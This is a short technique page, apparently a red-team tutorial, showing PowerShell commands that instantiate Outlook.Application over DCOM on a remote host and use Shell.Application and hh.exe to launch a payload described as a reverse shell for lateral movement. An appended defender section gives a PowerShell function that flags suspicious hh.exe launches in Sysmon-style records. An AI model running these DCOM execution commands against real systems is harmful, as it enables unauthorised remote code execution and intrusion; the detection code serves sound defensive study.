Using LOLBins via COM Objects for Reverse Shell
A COM object is instantiated remotely over DCOM on the target machine (192.168.1.5) using the Outlook.Application ProgID; passing a server name as the second argument to GetTypeFromProgID is what makes the activation remote rather than local. This technique demonstrates remote instantiation of a COM object over the network.
$com = [Type]::GetTypeFromProgID('Outlook.Application', '192.168.1.5')
$object = [System.Activator]::CreateInstance($com)
This command lists every member of the instantiated COM object whose name contains "Create". It helps identify potential method calls for further exploitation.
$object | Get-Member -Name "*Create*"
$object.CreateObject("Shell.Application").ShellExecute("C:\Windows\SysWOW64\hh.exe", "C:\Users\malefic\Desktop\malware.exe", "", "", 1)
Code execution is achieved using a Living off the Land Binaries (LOLBins) approach: the Outlook object's CreateObject method returns a Shell.Application COM object, whose ShellExecute invokes hh.exe, which in turn executes the malicious payload (malware.exe). The call is made on $object, the instance created above, rather than on the $com type handle.
This leads to lateral movement, as the executed binary contains a reverse shell, allowing the attacker to gain remote access to the compromised system.
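A defender-side check for the execution step above, added here as an example and not part of the original page: it walks constructed Sysmon-style process-creation records and flags hh.exe launches whose argument is not a .chm file, which is the tell in the command shown. The parent-process rule assumes that remote activation of Outlook.Application leaves OUTLOOK.EXE as the parent of hh.exe.

```powershell
# Constructed sample records shaped like Sysmon Event ID 1 (process creation) fields.
# These are not real telemetry; they mirror the command shown on this page.
$SampleEvents = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\SysWOW64\hh.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE'
        CommandLine = '"C:\Windows\SysWOW64\hh.exe" C:\Users\malefic\Desktop\malware.exe'
    },
    [pscustomobject]@{
        Image       = 'C:\Windows\hh.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\hh.exe" C:\Users\alice\Documents\manual.chm'
    }
)

function Test-SuspiciousHhExe {
    # Returns a finding object for an hh.exe launch that does not look like normal help usage,
    # or $null when the record is not hh.exe or looks benign.
    param([Parameter(Mandatory)] [object] $Record)

    if ($Record.Image -notmatch '\\hh\.exe$') { return $null }
    $reasons = @()

    # Drop the first token (the hh.exe path, quoted or not) to isolate the argument.
    $target = ($Record.CommandLine -replace '^("[^"]*"|\S+)\s*', '').Trim().Trim('"')

    # hh.exe's legitimate purpose is opening compiled HTML help (.chm) files.
    if ($target -and $target -notmatch '\.chm$') {
        $reasons += "argument is not a .chm file: $target"
    }
    # Assumption: remote DCOM activation of Outlook.Application leaves OUTLOOK.EXE as the parent.
    if ($Record.ParentImage -match '\\(OUTLOOK|WINWORD|EXCEL|POWERPNT)\.EXE$') {
        $reasons += "spawned by Office process: $($Record.ParentImage)"
    }
    if ($reasons.Count -eq 0) { return $null }

    [pscustomobject]@{
        Image       = $Record.Image
        ParentImage = $Record.ParentImage
        CommandLine = $Record.CommandLine
        Reasons     = ($reasons -join '; ')
    }
}

# Run over the samples; for live data, build records from
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
$SampleEvents | ForEach-Object { Test-SuspiciousHhExe -Record $_ } | Format-List
```

Only the first sample record is reported; the manual.chm launch from explorer.exe produces no finding.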